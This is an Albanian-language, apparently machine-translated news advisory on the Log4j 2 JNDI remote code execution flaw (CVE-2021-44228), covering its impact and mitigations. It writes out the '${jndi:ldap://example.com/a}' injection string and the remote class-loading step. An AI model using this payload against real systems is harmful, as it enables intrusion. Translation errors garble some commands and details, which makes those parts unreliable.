Kohët e fundit se publikoi lajmin se një cenueshmëri kritike u identifikua në Apache Log4j 2, i cili karakterizohet si një kornizë popullore për organizimin e regjistrit në aplikacionet Java, duke lejuar ekzekutimin e një kodi arbitrar kur një vlerë e formatuar posaçërisht shkruhet në regjistër në formatin "{jndi: URL}".
Prekshmëria Është i dukshëm sepse sulmi mund të kryhet në aplikacionet Java qëAta regjistrojnë vlerat e marra nga burime të jashtme, për shembull duke shfaqur vlera problematike në mesazhet e gabimit.
Observedshtë vërejtur se pothuajse të gjitha projektet që përdorin korniza si Apache Struts, Apache Solr, Apache Druid ose Apache Flink preken, duke përfshirë klientët dhe serverët e Steam, Apple iCloud, Minecraft.
Dobësia pritet të çojë në një valë sulmesh masive ndaj aplikacioneve të ndërmarrjeve, duke përsëritur historinë e dobësive kritike në kornizë, Apache Struts, e cila është një vlerësim i përafërt i përdorur në 65% të aplikacioneve në internet të Fortune 100. Lista e aplikacioneve në internet të kompanisë përfshinte përpjekje të regjistruara tashmë për të skanuar rrjetin për sisteme të cenueshme.
Dobësia lejon ekzekutimin në distancë të kodit të paautentikuar. Log4j 2 është një bibliotekë regjistrash me burim të hapur Java e zhvilluar nga Fondacioni Apache. Log4j 2 përdoret gjerësisht në shumë aplikacione dhe është i pranishëm, si varësi, në shumë shërbime. Këto përfshijnë aplikacione biznesi si dhe shërbime të shumta cloud.
Ekipi i sulmit Randori ka zhvilluar një shfrytëzim funksional dhe ka qenë në gjendje të shfrytëzojë me sukses këtë dobësi në mjediset e klientëve si pjesë e platformës sonë të sigurisë sulmuese.
Dobësia mund të arrihet përmes një morie metodash specifike për aplikacionin. Në të vërtetë, çdo skenar që lejon një lidhje të largët të ofrojë të dhëna arbitrare që një aplikacion që përdor bibliotekën Log4j shkruan në skedarët e regjistrit është i ndjeshëm ndaj shfrytëzimit. Kjo dobësi ka shumë të ngjarë të shfrytëzohet në natyrë dhe ka të ngjarë të prekë mijëra organizata. Kjo dobësi përfaqëson një rrezik real të konsiderueshëm për sistemet e prekura.
Problemi shtohet nga fakti se tashmë është publikuar një shfrytëzim funksional, p.sh.Por rregullimet për degët e qëndrueshme nuk janë krijuar ende. Identifikuesi CVE ende nuk është caktuar. Zgjidhja përfshihet vetëm në degën e provës log4j-2.15.0-rc1. Si një zgjidhje për të bllokuar cenueshmërinë, rekomandohet të vendosni parametrin Log4j2.formatMsgNoLookups në true.
Problemi ishte për shkak të faktit se Log4j 2 mbështet trajtimin e maskave speciale «{}» në linjat e regjistrave, në të cilën Pyetjet JNDI mund të ekzekutohen (Emërtimi Java dhe Ndërfaqja e Drejtorisë).
Në analizimin e CVE-2021-44228, Randori ka përcaktuar sa vijon:
Instalimet e parazgjedhura të softuerit të biznesit të përdorur gjerësisht janë të cenueshme.
Dobësia mund të shfrytëzohet në mënyrë të besueshme dhe pa vërtetim.
Dobësia prek versione të shumta të Log4j 2.
Dobësia lejon ekzekutimin e kodit në distancë kur përdoruesi drejton aplikacionin duke përdorur bibliotekën.
Sulmi zbret në kalimin e një vargu me zëvendësimin "$ {jndi: ldap: //example.com/a}", duke e përpunuar të cilin Log4j 2 do të dërgojë një kërkesë LDAP për rrugën drejt klasës Java te serveri sulmues.com . Rruga e kthyer nga serveri i sulmuesit (për shembull, http://example.com/Exploit.class) do të ngarkohet dhe ekzekutohet në kontekstin e procesit aktual, duke i lejuar sulmuesit të arrijë ekzekutimin arbitrar të kodit në sistem me të drejtat të aplikacionit aktual.
Në fund, përmendet se nëse konstatohen anomali, rekomandohet që të supozoni se ky është një incident aktiv, se është komprometuar dhe të përgjigjeni në përputhje me rrethanat. Përmirësimi në versionet e korrigjuara të Log4j 2 ose aplikacionet e prekura do ta eliminojë këtë dobësi. Randori rekomandon që çdo organizatë që mendon se mund të preket, të përmirësohet urgjentisht në një version të korrigjuar.
Në përditësimin më të fundit nga ekipi Apache Log4j, rekomandojmë që organizatat të bëjnë sa më poshtë
- Përditëso në Log4j 2.15.0
- Për ata që nuk mund të përmirësojnë në 2.15.0: Në versionet> = 2.10, kjo dobësi mund të zbutet duke vendosur tiparin e sistemit log4j2.formatMsgNoLookup ose variablin e mjedisit LOG4J_FORMAT_MSG_NO_LOOKUPS në true.
- Për versionet 2,0-beta9 deri në 2.10.0, lehtësimi është heqja e klasës JndiLookup nga shtegu i klasës: zip -q -d log4j-core - *. Jar org / apache / logging / log4j / core / lookup /JndiLookup.class.
Fuente: https://www.lunasec.io/